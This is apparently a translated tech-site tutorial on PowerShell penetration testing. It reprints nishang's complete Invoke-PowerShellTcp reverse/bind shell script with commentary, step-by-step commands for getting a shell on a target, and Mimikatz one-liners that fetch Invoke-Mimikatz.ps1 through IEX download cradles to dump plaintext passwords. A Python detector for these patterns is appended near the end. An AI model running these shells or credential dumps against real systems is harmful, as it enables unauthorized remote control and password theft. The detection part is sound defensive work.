2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
The editor shares with you a sample analysis of PowerShell penetration testing. Most people do not know much about this topic, so the article is shared here for your reference; I hope you learn a lot from it.
0x01 Supplementary knowledge
a. Command format
A PowerShell command takes the command name, then each required parameter with its value, then any optional parameters and switches:

```powershell
Command-Name -<RequiredParameterName> <RequiredParameterValue> [-<OptionalParameterName> <OptionalParameterValue>] [-<OptionalSwitchParameter>]
```
b. Equivalent aliases
Many commands have aliases, which will feel familiar to anyone who has used DOS or Unix. An alias is a short form of a command; its function is identical.
Command        Aliases
Clear-Host     cls, clear
Format-List    fl
Get-ChildItem  gci, ls, dir
Get-Content    gc, cat, type
Get-Location   gl, pwd
Get-Member     gm
Remove-Item    ri, rm, rmdir, del, erase, rd
Write-Output   write, echo
c. Execution policy issues
By default the PowerShell script execution policy does not allow any script to run. If the execution policy is not changed, running a script directly produces an error.
Solution:
First check the current execution policy with the Get-ExecutionPolicy command. If it prints Restricted, no scripts may be executed. Run PowerShell as an administrator and execute Set-ExecutionPolicy RemoteSigned; once that command returns, scripts can be executed.
0x02 Analysis TCP Interactive PowerShell script
The script is taken from nishang, a PowerShell attack framework that collects PowerShell attack scripts and payloads. Nishang is widely used at every stage of a penetration test. Download address: https://github.com/samratashok/nishang.
First paste its TCP interactive PowerShell script (establishing a TCP forward connection or reverse connection shell) with the following code:
```powershell
function Invoke-PowerShellTcp
{
<#
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        # Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        # Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535 | % {0}

        # Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        # Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                # Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            # Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
```
a. Comment section
The comments section describes the outline, purpose, examples, reference links, and other information of the script.
```powershell
<#
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
```
b. Param section (run-time parameters)
DefaultParameterSetName="reverse" makes the reverse-shell parameter set the default. Each parameter is declared for both the reverse and the bind parameter sets, with its own Mandatory setting per set: in the default reverse set both $IPAddress and $Port are mandatory, while in the bind set only $Port is. PowerShell selects the parameter set from the arguments actually supplied and binds each value according to its declared type.
```powershell
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )
```
c. Main function
```powershell
    try
    {
        # The connection may fail, so the whole body sits in a try/catch.
        # If the -Reverse switch was given, this is a TCP reverse shell: the local machine acts as the client.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }
        # If the -Bind switch was given, this is a TCP forward shell: the local machine acts as the server.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }
        # Build the data stream
        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535 | % {0}
        # Send information about the target to the attacker
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        # Interactive prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)
        # Keep reading until the peer sends no more data
        while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                # Execute the received command and capture its output
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)
            }
            catch
            {
                # Exception handling
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            # Append the current path as the next prompt
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            # Clear the error record
            $error.clear()
            $sendback2 = $sendback2 + $x
            # Return the ASCII-encoded data
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            # Flush the stream
            $stream.Flush()
        }
        # Close the connection
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        # Exception handling
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
```
0x03 Script usage
a. Import-command mode
In import-command mode the ps1 file is imported into PowerShell and the function is then called directly from the command line:

```powershell
Import-Module .\Invoke-PowerShellTcp.ps1
```
Reverse connection
Step 1: on the attacker machine, use nc to listen on local port 4444 (start the listener before connecting, otherwise the connection fails).
Step 2: on the target machine, run the connection command:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress <attacker IP> -Port <attacker listening port>
```
Step 3: the connection succeeds and a shell is obtained.
Forward connection
Step 1: the target machine starts listening:

```powershell
Invoke-PowerShellTcp -Bind -Port 4444
```
Step 2: the attacker machine connects to the target with nc:

```shell
nc -nv 192.168.17.132 4444
```
Step 3: the connection succeeds and a shell is obtained.
b. Non-import command mode
In this mode the script is not imported into PowerShell; the ps1 file is run directly.
Forward connection
Step 1: append the listening call to the end of the ps1 file:

```powershell
Invoke-PowerShellTcp -Bind
```
Step 2: run the ps1 file, enter the listening port when prompted, and the listener starts:

```powershell
.\Invoke-PowerShellTcp.ps1
```
Step 3: the attacker machine connects to the target with nc and obtains a shell.
Reverse connection
Step 1: the attacker machine listens on a port:

```shell
nc -lvp 8888
```
Step 2: append the connection call to the end of the ps1 file:

```powershell
Invoke-PowerShellTcp -Reverse 192.168.17.134 8888
```
Step 3: a shell is obtained.
0x04 Mimikatz combined with Powershell to obtain the account password of the target host
In real engagements, after obtaining a low-privilege user, we need to escalate privileges in order to expand the results. Without a 0day, the simplest way to escalate is to obtain the administrator account password of the target host directly. When it comes to obtaining passwords, Mimikatz has to be mentioned. Mimikatz is a very powerful open-source tool written in C. It supports extracting plaintext passwords, hashes, PIN codes and Kerberos credentials from Windows system memory, and also implements several attack techniques such as pass-the-hash, pass-the-ticket and building Golden Tickets.
This section covers using PowerShell together with Mimikatz. The test environment is a Windows Server 2008 host on Tencent Cloud.
a. Running in a local network environment
Step 1: download Invoke-Mimikatz.ps1
Invoke-Mimikatz.ps1 download address:
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Step 2: run it directly as a one-liner

```powershell
powershell Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
# or, in a local network environment where the script is hosted at http://192.168.1.1/
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/'); Invoke-Mimikatz -DumpCreds"
```
Step 3: the plaintext password is obtained.
b. Running in an Internet-connected environment
Step 1: execute the command directly
On Windows 2008 and later operating systems, execute:

```powershell
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```
Note: the target must be able to reach raw.githubusercontent.com, because the ps1 file is downloaded from there. On versions above Windows Server 2014 only NTLM hashes can be obtained; plaintext passwords cannot normally be recovered.
Step 2: the plaintext password is obtained.
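As a defender's counterpart to the two techniques analysed above (the nishang TCP shell in 0x02 and the Invoke-Mimikatz download cradle in 0x04), here is an added detection example; it is not code from the article, from nishang or from PowerSploit. It scans PowerShell script-block text, the field Windows records in Event ID 4104 once script block logging is enabled, for the indicator combinations those techniques leave behind: TcpClient/TcpListener plus Invoke-Expression for the interactive shell, and WebClient.DownloadString plus IEX and Invoke-Mimikatz for the cradle. The sample blocks and the host name example.invalid are constructed.

```python
import re

# Added example, not code from the article, nishang or PowerSploit. The patterns
# come from the two techniques the article walks through: the TCP shell
# (TcpClient/TcpListener feeding Invoke-Expression) and the Invoke-Mimikatz
# download cradle (IEX + WebClient.DownloadString, then -DumpCreds/sekurlsa).
# Patterns inside one rule are ANDed: a lone IEX or a lone TcpClient is common
# in legitimate scripts and must not fire on its own.
RULES = {
    "tcp_shell": [
        r"System\.Net\.Sockets\.Tcp(Client|Listener)",
        r"Invoke-Expression|\bIEX\b",
    ],
    "download_cradle": [
        r"Net\.WebClient",
        r"\.DownloadString\(",
        r"Invoke-Expression|\bIEX\b",
    ],
    "credential_dump": [
        r"Invoke-Mimikatz|sekurlsa::logonPasswords|-DumpCreds\b",
    ],
}

def scan_script_block(text: str) -> list[str]:
    """Names of the rules whose every pattern occurs in one script-block text
    (the ScriptBlockText field of Event ID 4104)."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, text, re.IGNORECASE) for p in pats)]

def scan_script_blocks(blocks: list[str]) -> dict[int, list[str]]:
    """Scan several script-block texts; keys are the indices that fired."""
    result = {}
    for i, text in enumerate(blocks):
        hits = scan_script_block(text)
        if hits:
            result[i] = hits
    return result

# Constructed sample script-block texts, not real telemetry.
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users | Format-List",
    "$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port); "
    "$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)",
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/"
    "Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    "$wc = New-Object Net.WebClient; $wc.DownloadFile($url, 'C:\\tmp\\a.zip')",
]

if __name__ == "__main__":
    for i, hits in scan_script_blocks(SAMPLE_BLOCKS).items():
        print(f"block {i}: {', '.join(hits)}")
```

Script block logging is off by default; with it on, the same rules can be run over Get-WinEvent output for the Microsoft-Windows-PowerShell/Operational log, and the fourth sample shows a plain DownloadFile use that correctly does not fire.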
That is all the content of the article "Sample Analysis of PowerShell Penetration Testing". Thank you for reading! I hope the content shared here helps you; if you want to learn more, welcome to follow the industry information channel.